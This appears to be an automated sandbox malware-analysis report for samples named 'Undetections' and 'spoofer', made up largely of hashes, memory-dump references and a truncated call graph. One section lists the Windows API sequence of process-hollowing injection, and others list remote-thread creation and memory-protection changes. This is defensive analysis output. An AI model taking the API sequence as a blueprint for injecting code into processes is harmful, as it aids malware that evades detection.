                                                                                                                                                                                                            • Opcode ID: 7c2529999549bdcc26de45ea212e4e675aa0c94fbaa9b710304cf96c36c455ed
                                                                                                                                                                                                            • Instruction ID: 5a978ab654b5e23d06e1b2e9a3491d936df539ef28c5ab37b1ad4c0883bdd78e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c2529999549bdcc26de45ea212e4e675aa0c94fbaa9b710304cf96c36c455ed
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6712BFF04027469AE710DF65E9682893BF1FB45328B54C329DA612B3E4D7BD198BCF84
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108574436.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fd0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3a9ea57632f804cd6cd792488cf2d076ffd485427a25e1f36770a21eb78b8cc8
                                                                                                                                                                                                            • Instruction ID: c2d741e21de119b7fd9c587ac6fc529a70975b73baf582163bb3b9075b4ce425
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a9ea57632f804cd6cd792488cf2d076ffd485427a25e1f36770a21eb78b8cc8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BE10B35D20B5A8ACB15EF64D950AD9F7B1FF95300F10C7AAE0493B225EB70AAC5CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108574436.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fd0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 2c50a9ab626f4cdacd4fc9afb7de56d71e3cba20c10ef9b58ce00cef8d69bdbf
                                                                                                                                                                                                            • Instruction ID: 447a0de6dda1c7dcc82818fff90b2a368e6c43c3bf0b3b5022d733bf5558b33a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c50a9ab626f4cdacd4fc9afb7de56d71e3cba20c10ef9b58ce00cef8d69bdbf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62D1EB35920B5A8ACB15EF64D950AD9F7B1FF95300F10C7AAE0493B224EF70AAC5CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6f0fdeb065a5777358d2589d8e2bed8d1a8be70bac78d35dac2d1d2650ad46d8
                                                                                                                                                                                                            • Instruction ID: 90dafe6b995959b9cd1e9e4701ec92962a8f84991a522bfe41690099439678ab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f0fdeb065a5777358d2589d8e2bed8d1a8be70bac78d35dac2d1d2650ad46d8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2A16B36A002198FCF15DFA4C8445AEB7B2FF85304B1595AAE906BF225DB35F925CF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c75652bf2ecb84b28c03bb9c9ac46d60557cd126902db31fdd1771d5d47c5a55
                                                                                                                                                                                                            • Instruction ID: a44cdbd90923fa63cfea122faa2fd30f6f0c8251288bef43a8ad9a4832762e3b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c75652bf2ecb84b28c03bb9c9ac46d60557cd126902db31fdd1771d5d47c5a55
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21C1F5B08027469AE710DF65E9681897BF1FB85324F14C329D9616B3E4D7BC198BCF84
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: dea3356014cdc596b00ddd116319835516db548f6779953da90c32e4b1954b2b
                                                                                                                                                                                                            • Instruction ID: f7dd108240f5e1a788c795d7555c24abd197fd5945e31cf042f7eafac43428cf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dea3356014cdc596b00ddd116319835516db548f6779953da90c32e4b1954b2b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5381BE72E00609DBCB10DFA5D8442EEFBB2FF84341F19C53AD455A7698EB398A56CB40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f89fe99e9bed46913f584f6012019ae63cd5331ea054cef89e1a7fc00e62df26
                                                                                                                                                                                                            • Instruction ID: e090774da459492e7be0859e1daca07a736ac4c82571786adffa9b6036149b0c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f89fe99e9bed46913f584f6012019ae63cd5331ea054cef89e1a7fc00e62df26
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC81B272E00609DBCB10DFA5D8442EDF7B2FF84340F29C53AD455A7698EB399A5ACB40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 8eda8aaa724ef3c90073f7780de8f56c4cda3990d0f418e63aa84a486e80da6a
                                                                                                                                                                                                            • Instruction ID: a869a6b1e6696d504ca1d96284670452fc2f4f6ddb28b82e9eaa7251a67773f4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8eda8aaa724ef3c90073f7780de8f56c4cda3990d0f418e63aa84a486e80da6a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA51AF75E002189FDB04DFE9D984AADBBF2BF89300F249129E809BB264D7349959CF14
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: b4eb3d9d077ac7d9ee343f52c7597f8dccda6849990c9df6cecbf4579da14ae7
                                                                                                                                                                                                            • Instruction ID: 654eb002988f215dd21e5eada999d5a1672894217211c32b9458858ab633cab5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4eb3d9d077ac7d9ee343f52c7597f8dccda6849990c9df6cecbf4579da14ae7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF51C675E046188FDB18CFAAD9406DDBBF2BF89304F14D16AD618AF264EB30A955CF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 7edbc2c1739ea673922782719224ebade5fe83dc1f838b9b268cde320aa53a41
                                                                                                                                                                                                            • Instruction ID: d4dc99d5837cd1b6d736a6851f40371f8f5f11e55711ca7bf5c908c15b6dbaa2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7edbc2c1739ea673922782719224ebade5fe83dc1f838b9b268cde320aa53a41
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 791181357007158FDB65CB68C880BAE73F6EFC8210F14416AD616D76A2DB34ED49C791
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:57.8%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                            Signature Coverage:14.6%
                                                                                                                                                                                                            Total number of Nodes:41
                                                                                                                                                                                                            Total number of Limit Nodes:3

                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0317261C
                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0317262F
                                                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0317264D
                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03172671
                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0317269C
                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 031726F4
                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0317273F
                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0317277D
                                                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 031727B9
                                                                                                                                                                                                            • ResumeThread.KERNELBASE(?), ref: 031727C8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1755614040.0000000003172000.00000040.00000800.00020000.00000000.sdmp, Offset: 03172000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3172000_spoofer.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                            • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                            • API String ID: 2687962208-977067982
                                                                                                                                                                                                            • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                            • Instruction ID: 804ed2fdf737dabf9d89eb400d5d17f2d4953178609f6cb5949a2d9525aad271
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B1E77664024AAFDB60CF68CC80BDA77A5FF8C714F158564EA0CAB341D774FA428B94
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1754346859.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_12c0000_spoofer.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                                                                                            • Opcode ID: cbe533d9424ef08f743da6c11d88969b4b206e99ca0c293006f5ab2d758b8edf
                                                                                                                                                                                                            • Instruction ID: 56d78a9b0845865a705f5aebb126c5c34186953979ceff84a54c5bdc1183bf3d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbe533d9424ef08f743da6c11d88969b4b206e99ca0c293006f5ab2d758b8edf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5512A035A11255CFCB02CFA9C0806EDFFF1BF59314B288699E595AB252C730ED81CBA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 115 12c10a8-12c110a 118 12c110c-12c1118 115->118 119 12c111a-12c1159 CreateRemoteThread 115->119 118->119 120 12c115b-12c1161 119->120 121 12c1162-12c1176 119->121 120->121
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 012C114C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1754346859.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_12c0000_spoofer.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateRemoteThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4286614544-0
                                                                                                                                                                                                            • Opcode ID: 8a2fda8c2d3481b1dffe6f7e30c33d6e1471b12801b40ced68eac3a00b2bc0dc
                                                                                                                                                                                                            • Instruction ID: cd4ddd7eea3ca3cd72845ec80c8ad43b1dffff3fc46815548455b745e299cb5a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a2fda8c2d3481b1dffe6f7e30c33d6e1471b12801b40ced68eac3a00b2bc0dc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE31D3B5901249DFCB10CFA9D985ADEBFF5FF48310F208429E918A7251D375A950CFA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 107 12c053c-12c110a 110 12c110c-12c1118 107->110 111 12c111a-12c1159 CreateRemoteThread 107->111 110->111 112 12c115b-12c1161 111->112 113 12c1162-12c1176 111->113 112->113
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 012C114C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1754346859.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_12c0000_spoofer.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateRemoteThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4286614544-0
                                                                                                                                                                                                            • Opcode ID: 39d4b9d1ef4ae4bb97275d9d9a1b250fc56534d865f4360686bacca86cc38334
                                                                                                                                                                                                            • Instruction ID: 513a9bc739741282acb722a01c21ebb59727edc730e66fde2b60301aa37de2f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39d4b9d1ef4ae4bb97275d9d9a1b250fc56534d865f4360686bacca86cc38334
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 173102B1900249DFCB10CF99D885ADEBBF5FB48310F208129EA18A7310D375A950CFA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 123 12c0530-12c106e VirtualProtect 126 12c1077-12c1098 123->126 127 12c1070-12c1076 123->127 127->126
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualProtect.KERNELBASE(04173584,?,?,?), ref: 012C1061
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1754346859.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_12c0000_spoofer.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                            • Opcode ID: 33b6987748dad2bbaf436df3e9257acb6eacb22a9cecddbbdbe6c4b5b2bccc4c
                                                                                                                                                                                                            • Instruction ID: 58dc7518c511a98d3372a79008d84b6dc2ba4f592b53e5bfb5fa623360082df6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33b6987748dad2bbaf436df3e9257acb6eacb22a9cecddbbdbe6c4b5b2bccc4c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 822104B1910259EFCB00DF9AC885BDEFBF4FB08320F10812AE918A7241D374A954CFA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:5.6%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:10.1%
                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                            Total number of Limit Nodes:27
4022a0 10 API calls 71960->71961 71962 4037eb 71961->71962 71963 4022a0 10 API calls 71962->71963 71964 403801 71963->71964 71965 4022a0 10 API calls 71964->71965 71966 403817 71965->71966 71967 4022a0 10 API calls 71966->71967 71968 403830 71967->71968 71969 4022a0 10 API calls 71968->71969 71970 403846 71969->71970 71971 4022a0 10 API calls 71970->71971 71972 40385c 71971->71972 71973 4022a0 10 API calls 71972->71973 71974 403872 71973->71974 71975 4022a0 10 API calls 71974->71975 71976 403888 71975->71976 71977 4022a0 10 API calls 71976->71977 71978 40389e 71977->71978 71979 4022a0 10 API calls 71978->71979 71980 4038b7 71979->71980 71981 4022a0 10 API calls 71980->71981 71982 4038cd 71981->71982 71983 4022a0 10 API calls 71982->71983 71984 4038e3 71983->71984 71985 4022a0 10 API calls 71984->71985 71986 4038f9 71985->71986 71987 4022a0 10 API calls 71986->71987 71988 40390f 71987->71988 71989 4022a0 10 API calls 71988->71989 71990 403925 71989->71990 71991 4022a0 10 API calls 71990->71991 71992 40393e 71991->71992 71993 4022a0 10 API calls 71992->71993 71994 403954 71993->71994 71995 4022a0 10 API calls 71994->71995 71996 40396a 71995->71996 71997 4022a0 10 API calls 71996->71997 71998 403980 71997->71998 71999 4022a0 10 API calls 71998->71999 72000 403996 71999->72000 72001 4022a0 10 API calls 72000->72001 72002 4039ac 72001->72002 72003 4022a0 10 API calls 72002->72003 72004 4039c5 72003->72004 72005 4022a0 10 API calls 72004->72005 72006 4039db 72005->72006 72007 4022a0 10 API calls 72006->72007 72008 4039f1 72007->72008 72009 4022a0 10 API calls 72008->72009 72010 403a07 72009->72010 72011 4022a0 10 API calls 72010->72011 72012 403a1d 72011->72012 72013 4022a0 10 API calls 72012->72013 72014 403a33 72013->72014 72015 4022a0 10 API calls 72014->72015 72016 403a4c 72015->72016 72017 4022a0 10 API calls 72016->72017 72018 403a62 72017->72018 72019 4022a0 10 API calls 72018->72019 72020 403a78 72019->72020 72021 4022a0 10 API calls 72020->72021 72022 403a8e 
72021->72022 72023 4022a0 10 API calls 72022->72023 72024 403aa4 72023->72024 72025 4022a0 10 API calls 72024->72025 72026 403aba 72025->72026 72027 4022a0 10 API calls 72026->72027 72028 403ad3 72027->72028 72029 4022a0 10 API calls 72028->72029 72030 403ae9 72029->72030 72031 4022a0 10 API calls 72030->72031 72032 403aff 72031->72032 72033 4022a0 10 API calls 72032->72033 72034 403b15 72033->72034 72035 4022a0 10 API calls 72034->72035 72036 403b2b 72035->72036 72037 4022a0 10 API calls 72036->72037 72038 403b41 72037->72038 72039 4022a0 10 API calls 72038->72039 72040 403b5a 72039->72040 72041 4022a0 10 API calls 72040->72041 72042 403b70 72041->72042 72043 4022a0 10 API calls 72042->72043 72044 403b86 72043->72044 72045 4022a0 10 API calls 72044->72045 72046 403b9c 72045->72046 72047 4022a0 10 API calls 72046->72047 72048 403bb2 72047->72048 72049 4022a0 10 API calls 72048->72049 72050 403bc8 72049->72050 72051 4022a0 10 API calls 72050->72051 72052 403be1 72051->72052 72053 4022a0 10 API calls 72052->72053 72054 403bf7 72053->72054 72055 4022a0 10 API calls 72054->72055 72056 403c0d 72055->72056 72057 4022a0 10 API calls 72056->72057 72058 403c23 72057->72058 72059 4022a0 10 API calls 72058->72059 72060 403c39 72059->72060 72061 4022a0 10 API calls 72060->72061 72062 403c4f 72061->72062 72063 4022a0 10 API calls 72062->72063 72064 403c68 72063->72064 72065 4022a0 10 API calls 72064->72065 72066 403c7e 72065->72066 72067 4022a0 10 API calls 72066->72067 72068 403c94 72067->72068 72069 4022a0 10 API calls 72068->72069 72070 403caa 72069->72070 72071 4022a0 10 API calls 72070->72071 72072 403cc0 72071->72072 72073 4022a0 10 API calls 72072->72073 72074 403cd6 72073->72074 72075 4022a0 10 API calls 72074->72075 72076 403cef 72075->72076 72077 4022a0 10 API calls 72076->72077 72078 403d05 72077->72078 72079 4022a0 10 API calls 72078->72079 72080 403d1b 72079->72080 72081 4022a0 10 API calls 72080->72081 72082 403d31 72081->72082 72083 4022a0 10 API calls 
72082->72083 72084 403d47 72083->72084 72085 4022a0 10 API calls 72084->72085 72086 403d5d 72085->72086 72087 4022a0 10 API calls 72086->72087 72088 403d76 72087->72088 72089 4022a0 10 API calls 72088->72089 72090 403d8c 72089->72090 72091 4022a0 10 API calls 72090->72091 72092 403da2 72091->72092 72093 4022a0 10 API calls 72092->72093 72094 403db8 72093->72094 72095 4022a0 10 API calls 72094->72095 72096 403dce 72095->72096 72097 4022a0 10 API calls 72096->72097 72098 403de4 72097->72098 72099 4022a0 10 API calls 72098->72099 72100 403dfd 72099->72100 72101 4022a0 10 API calls 72100->72101 72102 403e13 72101->72102 72103 4022a0 10 API calls 72102->72103 72104 403e29 72103->72104 72105 4022a0 10 API calls 72104->72105 72106 403e3f 72105->72106 72107 4022a0 10 API calls 72106->72107 72108 403e55 72107->72108 72109 4022a0 10 API calls 72108->72109 72110 403e6b 72109->72110 72111 4022a0 10 API calls 72110->72111 72112 403e84 72111->72112 72113 4022a0 10 API calls 72112->72113 72114 403e9a 72113->72114 72115 4022a0 10 API calls 72114->72115 72116 403eb0 72115->72116 72117 4022a0 10 API calls 72116->72117 72118 403ec6 72117->72118 72119 4022a0 10 API calls 72118->72119 72120 403edc 72119->72120 72121 4022a0 10 API calls 72120->72121 72122 403ef2 72121->72122 72123 4022a0 10 API calls 72122->72123 72124 403f0b 72123->72124 72125 4022a0 10 API calls 72124->72125 72126 403f21 72125->72126 72127 4022a0 10 API calls 72126->72127 72128 403f37 72127->72128 72129 4022a0 10 API calls 72128->72129 72130 403f4d 72129->72130 72131 4022a0 10 API calls 72130->72131 72132 403f63 72131->72132 72133 4022a0 10 API calls 72132->72133 72134 403f79 72133->72134 72135 4022a0 10 API calls 72134->72135 72136 403f92 72135->72136 72137 4022a0 10 API calls 72136->72137 72138 403fa8 72137->72138 72139 4022a0 10 API calls 72138->72139 72140 403fbe 72139->72140 72141 4022a0 10 API calls 72140->72141 72142 403fd4 72141->72142 72143 4022a0 10 API calls 72142->72143 72144 403fea 72143->72144 72145 
4022a0 10 API calls 72144->72145 72146 404000 72145->72146 72147 4022a0 10 API calls 72146->72147 72148 404019 72147->72148 72149 4022a0 10 API calls 72148->72149 72150 40402f 72149->72150 72151 4022a0 10 API calls 72150->72151 72152 404045 72151->72152 72153 4022a0 10 API calls 72152->72153 72154 40405b 72153->72154 72155 4022a0 10 API calls 72154->72155 72156 404071 72155->72156 72157 4022a0 10 API calls 72156->72157 72158 404087 72157->72158 72159 4022a0 10 API calls 72158->72159 72160 4040a0 72159->72160 72161 4022a0 10 API calls 72160->72161 72162 4040b6 72161->72162 72163 4022a0 10 API calls 72162->72163 72164 4040cc 72163->72164 72165 4022a0 10 API calls 72164->72165 72166 4040e2 72165->72166 72167 4022a0 10 API calls 72166->72167 72168 4040f8 72167->72168 72169 4022a0 10 API calls 72168->72169 72170 40410e 72169->72170 72171 4022a0 10 API calls 72170->72171 72172 404127 72171->72172 72173 4022a0 10 API calls 72172->72173 72174 40413d 72173->72174 72175 4022a0 10 API calls 72174->72175 72176 404153 72175->72176 72177 4022a0 10 API calls 72176->72177 72178 404169 72177->72178 72179 4022a0 10 API calls 72178->72179 72180 40417f 72179->72180 72181 4022a0 10 API calls 72180->72181 72182 404195 72181->72182 72183 4022a0 10 API calls 72182->72183 72184 4041ae 72183->72184 72185 4022a0 10 API calls 72184->72185 72186 4041c4 72185->72186 72187 4022a0 10 API calls 72186->72187 72188 4041da 72187->72188 72189 4022a0 10 API calls 72188->72189 72190 4041f0 72189->72190 72191 4022a0 10 API calls 72190->72191 72192 404206 72191->72192 72193 4022a0 10 API calls 72192->72193 72194 40421c 72193->72194 72195 4022a0 10 API calls 72194->72195 72196 404235 72195->72196 72197 4022a0 10 API calls 72196->72197 72198 40424b 72197->72198 72199 4022a0 10 API calls 72198->72199 72200 404261 72199->72200 72201 4022a0 10 API calls 72200->72201 72202 404277 72201->72202 72203 4022a0 10 API calls 72202->72203 72204 40428d 72203->72204 72205 4022a0 10 API calls 72204->72205 72206 4042a3 
